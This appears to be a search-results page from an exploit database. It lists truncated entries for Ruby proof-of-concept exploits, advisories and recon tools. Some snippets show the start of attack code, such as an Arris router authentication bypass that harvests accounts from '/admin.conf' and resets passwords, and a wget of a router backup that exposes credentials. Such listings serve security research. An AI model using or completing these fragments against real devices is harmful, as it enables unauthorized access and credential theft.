61 matches found
Chemtool 1.6.14 - Memory Corruption Vulnerability
Exploit for linux platform in category dos / poc Document Title: =============== Chemtool 1.6.14 Memory Corruption Vulnerability Date: ============= 08/02/2015 Vendor Homepage: ================ http://ruby.chemie.uni-freiburg.de/martin/chemtool/ Abstract Advisory Information:...
Search all Github Repositories for an Organization
gumbler is a script I wrote to search through git commits and introduced in the blog post "Searching Through Git Commits". Recently I wanted to run Gumbler across all repositories for an organization, the steps are discussed below. First, we need to grab a list of repositories for the ORG. This c...
Arris VAP2500 - Authentication Bypass
Arris VAP2500 - Authentication Bypass !/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1"...
Arris VAP2500 - Authentication Bypass
!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1" if users puts " found user accounts:...
Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST PoC Exploit
No description provided by source. !/usr/bin/ruby Copyright c Lance M. Havok lmh at info-pull.com Kevin Finisterre kflists at digitalmunition.com Proof of concept for issues described in MOAB-18-01-2007. require 'net/ftp' require 'socket' bugselected = ARGV0 || 0.toi targethost = ARGV1 || localho...
Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness
No description provided by source. source: http://www.securityfocus.com/bid/20138/info Apple QuickTime plug-in is prone to an arbitrary-script-execution weakness when executing QuickTime Media Link files .qtl. An attacker can exploit this issue to execute arbitrary script code in the context of t...
Traidnt UP 2.0 - Remote SQL Injection Exploit
No description provided by source. !/usr/bin/ruby ============================================= Traidnt UP v2.0 Exploit SQL Injection Vulnerability --------------------------------------------- Date: 05-08-2009 Discovered & written by: Jafer Al-Zidjali Email: jaferatscorpionds.com Website:...
Host-Extract - Enumerate All IP/Host Patterns In A Web Page
This little ruby script tries to extract all IP/Host patterns in page response of a given URL and JavaScript/CSS files of that URL. With it, you can quickly identify internal IPs/Hostnames, development IPs/ports, cdn, load balancers, additional attack entries related to your target that are...
Bandizip 3.09 Crash Proof Of Concept
!/usr/bin/env ruby Exploit Title: Bandizip 3.09 .zip Crash POC Date: February 6th 2014 Author: Osanda Malith Jayathissa E-Mail: osandajayathissagmail.com Version: 3.09 32bit and 64bit Below versions might be affected Vendor Homepage: http://www.bandisoft.com/ Tested on: Windows XP 32-bit SP2 en,...
ARRIS DG860A NVRAM Backup Compressor / Decompressor
! /usr/bin/env ruby ARRIS DG860A NVRAM Backup 'Compressor/Decompressor', it really does xor? Gleaned from scmix executable in firmware dump. Backup file is world readable without authentication and contains password information in plain text. box:arris-dev cosmo$ wget http://192.168.0.1/router.da...
New Jigsaw Hacking Tool Spotted in Attacks
If you’ve run an internal phishing exercise, chances are you may have used Jigsaw, an open source penetration testing tool that enables security teams to automatically generate email address combinations from a minimal amount of public information. As with other open source security and networkin...
ActiveScriptRuby vulnerable to arbitrary Ruby script execution
Overview ActiveScriptRuby contains a vulnerability where an arbitrary Ruby script may be executed on a web browser that can execute ActiveX controls when HTML is displayed. ActiveScriptRuby is a software to implement Ruby into a Windows environment. ActiveScriptRuby contains a vulnerability where...
JVN#33283707: ActiveScriptRuby vulnerable to arbitrary Ruby script execution
ActiveScriptRuby is a software to implement Ruby into a Windows environment. ActiveScriptRuby contains a vulnerability where an arbitrary Ruby script may be executed on the web browser that can execute ActiveX controls when HTML is displayed. Impact A remote attacker may be able to obtain...
Novell Netware XNFS caller_name xdrDecodeString Code Execution
Application: Novell Netware XNFS callername xdrDecodeString Remote Code Execution Vulnerability Platforms: Novell Netware 6.5 SP8 Exploitation: Remote code execution CVE Number: Novell TID: 5117430 ZDI: ZDI-12-11 PRL: 2012-03 Author: Francis Provencher Protek Research Lab's Website:...
Novell Netware XNFS.NLM NFS Rename Remote Code Execution
Application: Novell Netware XNFS.NLM NFS Rename Remote Code Execution Vulnerability Platforms: Novell Netware 6.5 SP8 Exploitation: Remote code execution CVE Number: Novell TID: 5117430 ZDI: ZDI-12-06 PRL: 2012-02 Author: Francis Provencher Protek Research Lab's Website:...
A-PDF All to MP3 2.3.0 - Universal DEP Bypass
A-PDF All to MP3 2.3.0 - Universal DEP Bypass !/usr/bin/ruby +Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit +Date: 09\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.a-pdf.com/all-to-mp3/ +Version: 2.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A Dep bypa...
POP Peeper 3.7 SEH Overflow
!/usr/bin/ruby Title: POP Peeper 3.7 SEH Exploit Tested on: Windows XP SP2 EN Target: POP Peeper 3.7.0.0 Download Link: http://www.poppeeper.com/download.php Author: Anastasios Monachos secuid0 - anastasiosmatgmaildotcom Greetz: offsec team, inj3ct0r team appdata = ENV'APPDATA' file = appdata...
Host-Extract - Host/IP Pattern Extractor Tool !
Host-Extract - Host/IP Pattern Extractor Tool ! This little ruby script tries to extract all IP/Host patterns in page response of a given URL and JavaScript/CSS files of that URL. With it, you can quickly identify internal IPs/Hostnames, development IPs/ports, cdn, load balancers, additional...
Microsoft Internet Explorer 8 - CSS Parser
Microsoft Internet Explorer 8 - CSS Parser !/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts =...
RomPager 4.07 Denial Of Service
Software: "RomPager/4.07 UPnP/1.0" Issue: A reboot can be caused when a special crafted http request is sent. Other Details: This version of RomPager is seen on a number of residential routers that are shipped by a number of different ISP's. The router I personal know it effects is the d-link...